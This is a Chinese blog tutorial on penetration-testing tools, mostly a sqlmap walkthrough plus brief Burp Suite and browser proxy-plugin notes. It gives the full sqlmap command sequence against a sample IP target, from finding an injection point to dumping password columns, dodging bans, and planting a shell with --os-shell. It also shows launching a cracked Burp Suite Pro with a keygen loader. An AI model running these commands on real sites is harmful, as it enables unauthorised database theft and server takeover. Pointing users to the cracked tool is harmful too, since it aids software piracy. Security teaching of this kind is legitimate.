渗透测试常用工具

本文介绍了渗透测试中常用的工具,包括Python和Java环境的安装,重点讲解了sqlmap的使用,它是一款强大的SQL注入自动化工具。此外,还提到了Burp Suite,这是一个集成的web应用攻击平台,虽然未详述其操作,但提到了证书安装和代理设置。最后,讨论了谷歌浏览器插件,特别是Proxy SwitchySharp,用于便捷地切换代理。
摘要由CSDN通过智能技术生成

一、环境的安装

1、Python
Python(2.7.16)下载地址
下载好文件之后,直接安装即可

2、Java
Java下载地址

3、环境变量
环境变量一般是指在操作系统中用来指定操作系统运行环境的一些参数,如果定义了某个环境变量的路径,那么当在windows系统的变量中寻找不到的时候,就会去添加的路径中寻找对应的东西。

例如,将桌面(C:\Users\ASUS\Desktop)加入环境变量,就可以在任意路径的cmd窗口打开桌面的文件

win10系统环境变量怎么设置

可以将Python和Java添加入环境变量,方便使用命令行访问。

二、sqlmap

sqlmap 是使用最为广泛的自动化检测、利用SQL注入的渗透测试工具,支持多种数据库。

sqlmap下载地址

下载好后直接解压,并加入环境变量,就可以直接在cmd调用

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

#常用指令
-u #指定注入点
--dbs #跑库名
--tables #跑表名
--columns #跑字段名
--dump #枚举数据(危险,不要轻易使用)
-D #指定库
-T #指定表
-C #指定字段

--random-agent #选择随机请求头(user-agents),一定程度上防止被禁
--delay=1 #每次探测延时超过1秒,防止访问过快被禁
--count #查看数据量
--proxy "http://127.0.0.1:1080" #使用本地1080端口
--level #1-5测试等级,等级越高检测越详细,level大于2会检测cookie注入,大于3会检测头注入,一般使用等级3
--risk #与level类似,但测试语句更丰富,可与level搭配使用,level主要测试传参
--is-dba #查询当前用户权限,如果DBA是True可以尝试直接拿webshell
--os-shell #尝试往网站中放入一个cmdshell(拥有cmd权限的shell),先选择写入shell的脚本语言
--flush-session #清楚缓存,防止网站漏洞更新,出现差错
--batch #不建议使用,所有的选项走默认选项,可能出错

SQLMap用户手册(详细)

例如,找到一个存在SQL注入的网站http://59.1.1.1:8003/?id=1

python sqlmap.py -u http://59.1.1.1:8003/?id=1

在这里插入图片描述
在这里插入图片描述

#使用流程

#探测是否存在注入点
python sqlmap.py -u http://59.1.1.1:8003/?id=1

#跑库名
python sqlmap.py -u http://59.1.1.1:8003/?id=1 --dbs

#指定库名,输出表名
python sqlmap.py -u http://59.1.1.1:8003/?id=1 -D 库名 --tables

#指定库名、表名,输出字段名及其类型
python sqlmap.py -u http://59.1.1.1:8003/?id=1 -D 库名 -T 表名 --columns

#指定库名、表名、字段名,输出数据
python sqlmap.py -u http://59.1.1.1:8003/?id=1 -D 库名 -T 表名 -C password --dump

#指定库名、表名,直接输出数据
#脱库,如果没有获得授权,则为非法获取数据库里的信息
python sqlmap.py -u http://59.1.1.1:8003/?id=1 -D 库名 -T 表名 --dump

#1秒发送1个数据包,随机请求头
python sqlmap.py -u http://59.1.1.1:8003/?id=1 -D 库名 -T 表名 --delay=1 --random-agent --dump

#查询数据量
python sqlmap.py -u http://59.1.1.1:8003/?id=1 -D 库名 -T 表名 --count

#使用等级3进行测试
python sqlmap.py -u http://59.1.1.1:8003/?id=1 --level 3

#常用的渗透测试语句
python sqlmap.py -u http://59.1.1.1:8003/?id=1 --level 3 --risk 2

#查询当前用户权限,如果权限为False,则权限不够,权限为True,则可以直接拿webshell
python sqlmap.py -u http://59.1.1.1:8003/?id=1 --is-dba

#如果权限为True,尝试往网站中放入一个cmdshell(拥有cmd权限的shell),先选择写入shell的脚本语言
#当然,能够直接getshell的网站很少
python sqlmap.py -u http://59.1.1.1:8003/?id=1 --os-shell

#拿到webshell之后,常用的cmd命令
whoami #得到的系统权限,例如nt authority\system为最高权限
dir #查看当前目录
systeminfo #查看详细信息

三、Burp Suite

Burp Suite 是用于攻击web应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP消息、持久性、认证、代理、日志、警报。

此处不详细介绍Burp Suite的安装、运行、操作。

#如果补丁失效,通过cmd命令行直接运行Burp Suite

javaw -jar burpsuite_pro_v1.7.30.jar

java -Xbootclasspath/p:burp-loader-keygen.jar -jar burpsuite_pro_v1.7.30.jar

证书的安装:
(1)访问监听的端口
(2)下载证书
(3)导入证书,重启浏览器即可

代理:将信息发送给中间人,由中间人发送出去

发送方 -> 中间人(Burp) -> 接收方

简单操作:抓包,抓返回包,单放包,查看返回包

抓包:拦截数据包

放包

如何利用Burp Suite进行爆破

四、谷歌浏览器插件

谷歌浏览器下载地址

浏览器插件其实就是浏览器的扩展,360浏览器的极速模式使用了谷歌内核,所以兼容谷歌浏览器插件。

插件可以帮助我们更好的对浏览器进行操作,例如Proxy SwitchySharp插件可以帮助我们快速的使用代理。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

弈-剑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值